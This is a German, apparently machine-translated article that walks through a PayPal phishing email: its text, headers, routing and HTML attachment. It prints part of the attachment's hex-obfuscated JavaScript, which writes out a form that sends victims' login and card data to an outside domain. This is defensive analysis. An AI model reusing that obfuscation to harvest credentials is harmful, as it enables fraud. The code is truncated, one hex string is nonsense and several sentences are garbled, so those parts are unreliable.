Startseite » wie man » Online-Sicherheit Durchbruch der Anatomie einer Phishing-E-Mail

    Online-Sicherheit Durchbruch der Anatomie einer Phishing-E-Mail


    In der heutigen Welt, in der alle Informationen online sind, ist Phishing einer der populärsten und verheerendsten Online-Angriffe, da Sie einen Virus jederzeit bereinigen können. Wenn jedoch Ihre Bankdaten gestohlen werden, haben Sie Probleme. Hier ist ein Zusammenbruch eines solchen Angriffs, den wir erhalten haben.

    Denken Sie nicht, dass es nur Ihre Bankdaten sind, die wichtig sind: Wenn jemand die Kontrolle über Ihr Konto-Login erlangt, kennen Sie nicht nur die Informationen, die in diesem Konto enthalten sind, sondern die Wahrscheinlichkeit, dass die gleichen Login-Informationen für verschiedene andere verwendet werden Konten. Und wenn sie Ihr E-Mail-Konto gefährden, können sie alle Ihre anderen Kennwörter zurücksetzen.

    Neben starken und variablen Passwörtern müssen Sie also immer nach falschen E-Mails Ausschau halten, die sich als echte Maskerade erweisen. Während die meisten Phishing-Versuche Amateure sind, sind einige ziemlich überzeugend, daher ist es wichtig zu verstehen, wie man sie auf Oberflächenebene erkennt und wie sie unter der Haube arbeiten.

    Bild von asirap

    Untersuchen, was in Sicht ist

    Wie die meisten Phishing-Versuche „benachrichtigt“ Sie unsere Beispiel-E-Mail über Aktivitäten auf Ihrem PayPal-Konto, die unter normalen Umständen alarmierend sind. Der Aufruf zum Handeln besteht also darin, Ihr Konto zu überprüfen / wiederherzustellen, indem Sie nahezu alle persönlichen Informationen einreichen, die Sie sich vorstellen können. Das ist wieder ziemlich formelhaft.

    Zwar gibt es sicherlich Ausnahmen, aber so ziemlich jede Phishing- und Scam-E-Mail wird mit roten Flaggen direkt in der Nachricht selbst geladen. Selbst wenn der Text überzeugend ist, können Sie normalerweise viele Fehler im Nachrichtentext finden, die darauf hinweisen, dass die Nachricht nicht legitim ist.

    Der Nachrichtentext

    Auf den ersten Blick ist dies eine der besseren Phishing-E-Mails, die ich gesehen habe. Es gibt keine Rechtschreib- oder Grammatikfehler, und die Aussage liest sich entsprechend dem, was Sie vielleicht erwarten. Es gibt jedoch einige rote Markierungen, die Sie sehen können, wenn Sie den Inhalt etwas genauer untersuchen.

    • "Paypal" - Der richtige Fall ist "PayPal" (Großbuchstabe P). Sie können sehen, dass beide Varianten in der Nachricht verwendet werden. Unternehmen sind mit ihrem Branding sehr bewusst, daher ist es zweifelhaft, dass so etwas den Korrekturprozess bestehen würde.
    • „ActiveX zulassen“ - Wie oft haben Sie schon gesehen, dass ein seriöses, webbasiertes Unternehmen eine proprietäre Komponente verwendet, die nur mit einem einzigen Browser funktioniert, insbesondere wenn mehrere Browser unterstützt werden? Sicher, irgendwo da draußen macht es eine Firma, aber das ist eine rote Flagge.
    • "Sicher". - Beachten Sie, dass dieses Wort nicht am Rand des Abschnittstextes steht. Selbst wenn ich das Fenster etwas mehr ausdehne, wird es nicht richtig umbrochen.
    • "Paypal!" - Das Leerzeichen vor dem Ausrufezeichen sieht unbeholfen aus. Nur eine weitere List, von der ich sicher bin, dass sie nicht in einer legitimen E-Mail wäre.
    • "PayPal-Account Update Form.pdf.htm" - Warum würde Paypal ein "PDF" anhängen, insbesondere wenn sie nur auf eine Seite ihrer Website verlinken könnten? Warum sollten sie außerdem versuchen, eine HTML-Datei als PDF zu tarnen? Dies ist die größte rote Flagge von allen.

    Der Nachrichtenkopf

    Wenn Sie sich den Nachrichtenkopf ansehen, werden einige weitere rote Markierungen angezeigt:

    • Die Absenderadresse lautet [email protected].
    • Die zu adresse fehlt. Ich habe dies nicht ausgeblendet, es ist einfach nicht Teil des Standardnachrichtenkopfs. Normalerweise personalisiert eine Firma, die Ihren Namen hat, die E-Mail an Sie.

    Der Anhang

    Wenn ich die Anlage öffne, können Sie sofort erkennen, dass das Layout nicht korrekt ist, da Stilinformationen fehlen. Warum sollte PayPal ein HTML-Formular per E-Mail senden, wenn Sie einfach einen Link auf der Website angeben können??

    Hinweis: Wir haben dafür den integrierten HTML-Anhang-Viewer von Google Mail verwendet. Wir empfehlen jedoch, KEINE Anhänge von Betrügern zu öffnen. Noch nie. Je. Sie enthalten häufig Exploits, mit denen Trojaner auf Ihrem PC installiert werden, um Ihre Kontoinformationen zu stehlen.

    Wenn Sie ein wenig weiter scrollen, sehen Sie, dass dieses Formular nicht nur nach unseren PayPal-Anmeldeinformationen, sondern auch nach Bank- und Kreditkarteninformationen verlangt. Einige Bilder sind defekt.

    Es ist offensichtlich, dass dieser Phishing-Versuch alles auf einen Schlag erledigt.

    Der technische Zusammenbruch

    Es sollte zwar klar sein, dass dies ein Phishing-Versuch ist, doch wir werden jetzt die technische Zusammensetzung der E-Mail abbauen und sehen, was wir finden können.

    Informationen aus der Anlage

    Als Erstes sollten Sie sich die HTML-Quelle des Anhangsformulars ansehen, die die Daten an die gefälschte Site übermittelt.

    Wenn Sie die Quelle schnell anzeigen, erscheinen alle Links gültig, da sie entweder auf "paypal.com" oder "paypalobjects.com" zeigen, was beide legitim sind.

    Nun wollen wir uns einige grundlegende Seiteninformationen ansehen, die Firefox auf der Seite sammelt.

    Wie Sie sehen, werden einige Grafiken von den Domains "blessedtobe.com", "goodhealthpharmacy.com" und "pic-upload.de" anstelle der legitimen PayPal-Domains abgerufen.

    Informationen aus den E-Mail-Headern

    Als Nächstes betrachten wir die rohen E-Mail-Nachrichtenköpfe. Google Mail macht dies über die Menüoption Original anzeigen in der Nachricht verfügbar.

    Wenn Sie sich die Header-Informationen für die Originalnachricht ansehen, können Sie sehen, dass diese Nachricht mit Outlook Express 6 erstellt wurde. Ich bezweifle, dass PayPal Mitarbeiter hat, die jede dieser Nachrichten manuell über einen veralteten E-Mail-Client senden.

    Wenn Sie nun die Routing-Informationen betrachten, können wir die IP-Adresse sowohl des Senders als auch des weitergeleiteten Mail-Servers sehen.

    Die Benutzer-IP-Adresse ist der ursprüngliche Absender. Nach einem kurzen Blick auf die IP-Informationen sehen wir, dass die sendende IP in Deutschland ist.

    Und wenn wir uns die Mail-Adresse des weitergeleiteten Mail-Servers (mail.itak.at) ansehen, sehen wir, dass dies ein ISP mit Sitz in Österreich ist. Ich bezweifle, dass PayPal ihre E-Mails direkt über einen in Österreich ansässigen ISP leitet, wenn sie über eine umfangreiche Serverfarm verfügen, die diese Aufgabe problemlos erledigen könnte.

    Wohin gehen die Daten??

    Wir haben also eindeutig festgestellt, dass es sich um eine Phishing-E-Mail handelt, und es wurden Informationen dazu gesammelt, woher die Nachricht stammt, aber wie ist es, wo Ihre Daten gesendet werden?

    Um dies zu sehen, müssen wir zuerst den HTM-Anhang speichern, unseren Desktop ausführen und in einem Texteditor öffnen. Wenn Sie darin blättern, scheint alles in Ordnung zu sein, außer wenn wir zu einem verdächtig aussehenden Javascript-Block kommen.

    Die vollständige Quelle des letzten Blocks von Javascript ausbrechen, sehen wir:


    // Copyright © 2005 Voormedia - WWW.VOORMEDIA.COM
    var i, y, x =“3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e“; y =“; for (i = 0; i

    Jedes Mal, wenn Sie eine große durcheinandergebrachte Kette scheinbar zufälliger Buchstaben und Zahlen in einem Javascript-Block sehen, ist dies normalerweise etwas Verdächtiges. Beim Blick auf den Code wird die Variable "x" auf diese große Zeichenfolge gesetzt und dann in die Variable "y" dekodiert. Das Endergebnis der Variablen "y" wird dann als HTML in das Dokument geschrieben.

    Da die große Zeichenfolge aus den Zahlen 0-9 und den Buchstaben a-f besteht, wird sie höchstwahrscheinlich über eine einfache ASCII-zu-Hex-Umwandlung codiert:

    367645a6a6a6a66a6a66a6a66a6a66a6a6a66a6a66a6a66a6a66a6a66a66a6a66a6a66a6a66a6a6a66a6a66a6e66a66a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6a6d66a6a6a6a6a6d66a6a6a6a6a6a6d6a6a6d6a6a6b6e6d6646d6a6a6a6b6e6d6a6a6b6e6d6a6b6e6d6646

    Wird übersetzt in:

    Es ist kein Zufall, dass dies in ein gültiges HTML-Formular-Tag dekodiert wird, das die Ergebnisse nicht an PayPal, sondern an eine Rogue-Site sendet.

    Wenn Sie den HTML-Quellcode des Formulars anzeigen, werden Sie außerdem sehen, dass dieses Formular-Tag nicht sichtbar ist, da es dynamisch über das Javascript generiert wird. Dies ist eine clevere Methode, um zu verbergen, was der HTML-Code tatsächlich tut, wenn jemand die generierte Quelle des Anhangs (wie zuvor) lediglich anzeigen würde, anstatt den Anhang direkt in einem Texteditor zu öffnen.

    Wenn Sie ein schnelles whois auf der beleidigenden Site ausführen, können Sie feststellen, dass dies eine Domäne ist, die von einem beliebten Webhost 1und1 gehostet wird.

    Auffällig ist, dass die Domain einen lesbaren Namen verwendet (im Gegensatz zu „dfh3sjhskjhw.net“) und die Domain seit 4 Jahren registriert ist. Aus diesem Grund glaube ich, dass diese Domain entführt und in diesem Phishing-Versuch als Pfand verwendet wurde.

    Zynismus ist eine gute Verteidigung

    Wenn es darum geht, online sicher zu bleiben, schadet es nie, ein bisschen Zynismus zu haben.

    Ich bin mir sicher, dass die Beispiel-E-Mail mehr rote Flaggen enthält. Was wir oben erwähnt haben, sind Indikatoren, die wir bereits nach wenigen Minuten der Untersuchung gesehen haben. Hypothetisch würde die technische Analyse immer noch ihre wahre Natur zeigen, wenn die Oberfläche der E-Mail ihren legitimen Gegenwert zu 100% nachbildete. Deshalb ist es wichtig zu importieren, was man sehen kann und was nicht.